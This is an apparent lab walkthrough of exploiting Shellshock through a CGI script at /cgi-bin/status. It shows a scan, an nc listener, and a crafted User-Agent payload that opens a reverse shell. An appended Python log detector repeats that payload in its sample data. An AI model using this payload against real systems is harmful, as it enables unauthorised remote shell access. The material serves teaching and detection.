So it is said that if you know your enemies and know yourself, you will not be put at risk even if you have a hundred battles. — The Art of War

This vulnerability impacts the Bourne Again Shell “Bash”. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.

Difficulty: 1/5

  • Nmap
  • Burp
  • Firebug
  • NC

Detail Assessment and Planning

  • Port scan to identify open ports, running services and service versions. — Nmap
  • Identify the vulnerability and the path /cgi-bin/status. — Burp, Firebug
  • Exploit the Shellshock vulnerability to get a reverse shell. — NC

Waging War

Weaknesses and Strengths

Used Nmap to identify open ports. TCP port 80 is open and an Apache service is running on it.

By visiting the application with Burp, I can detect that multiple URLs are accessed when the page is loaded:

Also, by using Firebug, I can identify the CGI page that calls a system command: /cgi-bin/status


Listen on port 443 on the attacker's machine:

# nc -l -p 443

Then send a request whose User-Agent header carries the Shellshock payload to the CGI script:

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 443 -e /bin/sh\r\nHost:\r\nConnection: close\r\n\r\n" | nc 80

is the attacker's machine and is the victim machine.
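As an added example (not part of the original write-up), here is a small Python detector for the request pattern shown above. A CGI server exports request headers as HTTP_* environment variables (User-Agent becomes HTTP_USER_AGENT, Referer becomes HTTP_REFERER), and a vulnerable Bash parses any exported value beginning with "() {" as a function definition and keeps executing what follows the closing brace. The script parses Apache combined-format access log lines, flags requests whose User-Agent or Referer contains that marker, and pulls out the trailing command for the analyst. The log lines, the addresses and the ATTACKER_IP token are constructed placeholders, not data from the post.

```python
import re

# Constructed sample Apache "combined" log lines (not from the original post).
# Line 2 carries a Shellshock-style User-Agent of the kind the write-up uses;
# line 3 carries a probe in the Referer header instead.
SAMPLE_LOG = r'''
10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2014:13:55:40 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /usr/bin/nc ATTACKER_IP 443 -e /bin/sh"
10.0.0.9 - - [10/Oct/2014:13:55:41 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :; }; echo probe" "curl/7.35"
10.0.0.7 - - [10/Oct/2014:13:56:02 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux)"
'''

# Apache combined log format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Bash treats an exported variable whose value starts with "() {" as a
# function definition; vulnerable versions go on executing the text after
# the closing brace.  Whitespace between "()" and "{" is optional.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def shellshock_hits(log_text):
    """Return a list of (host, request, field, tail) for requests that carry a
    Shellshock-style function definition in a header CGI exports to the
    environment.  'tail' is the text after the function body, i.e. what a
    vulnerable shell would have run."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("agent", "referer"):
            m = SHELLSHOCK_RE.search(rec[field])
            if m:
                close = rec[field].find("}", m.end())
                tail = rec[field][close + 1:].lstrip(" ;") if close != -1 else ""
                hits.append((rec["host"], rec["request"], field, tail))
    return hits

if __name__ == "__main__":
    for host, request, field, tail in shellshock_hits(SAMPLE_LOG):
        print(f"{host} {request!r} via {field}: {tail!r}")
```

Only User-Agent and Referer are checked because those are the two header values the combined log format records; other headers the CGI also exports (Host, Cookie, Accept) are not in the log unless you add them to the LogFormat, so a complete detector belongs at the web server or WAF layer where the full request is visible.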